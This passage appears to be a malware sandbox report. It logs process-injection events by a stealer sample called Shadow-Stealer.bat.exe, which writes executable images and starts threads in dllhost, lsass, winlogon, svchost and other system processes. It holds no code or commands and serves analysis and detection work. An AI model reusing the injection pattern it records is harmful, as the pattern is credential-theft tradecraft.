            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E42990000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15CB30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF3370000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23CA0490000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA770000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDE60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 9D0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D50000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D60000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1050000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: A30000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D70000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D80000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1070000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D50000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D60000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 9E0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2950000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2900000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: BA0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: A00000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 27D0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: F50000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 930000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 13A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016730000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1660000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E429F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15CB90000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF33D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23CA04F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA7D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDEC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2400000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 225966B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E67120000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A510000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 165829A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E29A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA29A0
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Windows\SysWOW64\cscript.exe EIP: 2DC2102
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 166129A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F15429A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 428D29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B4629A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B29A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD629A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 166729A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F15A29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 429329A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5CAD29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F33129A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FDC29A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CA7129A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 166D29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F16029A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 429929A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5CB329A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F33729A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A04929A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CA7729A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EDE629A0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A19829A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 95FB29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 670C29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4A4B29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 19A429A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1FC29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDC929A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8FC29A0
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 9D2102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe EIP: D52102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe EIP: D62102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: A32102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: D72102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe EIP: D82102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 1072102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 1402102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 2D52102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 2D62102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 9E2102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 2952102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 2902102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: BA2102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: A02102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 27D2102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: F52102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 932102
            Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 13A2102
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 167329A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F16629A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 429F29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5CB929A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F33D29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A04F29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA7D29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EDEC29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A24029A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 966B29A0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 671229A0
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140002000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 1816F6E010Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2FCA008Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140002000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 8AFD72E010Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2A6A008Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140002000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 21855B6010Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 402000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2A89008Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: F797457010Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 28A9008Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 93E5D96010Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: F34EE1A010Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: A2AB2C010Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2B1A008Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 29CA008Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2AEB008Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: CD0E768010Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: D5C464010Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 26FD008Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 404000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2903008Jump to behavior
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B4C0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 2DC0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D30000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6830000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6820000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6820000
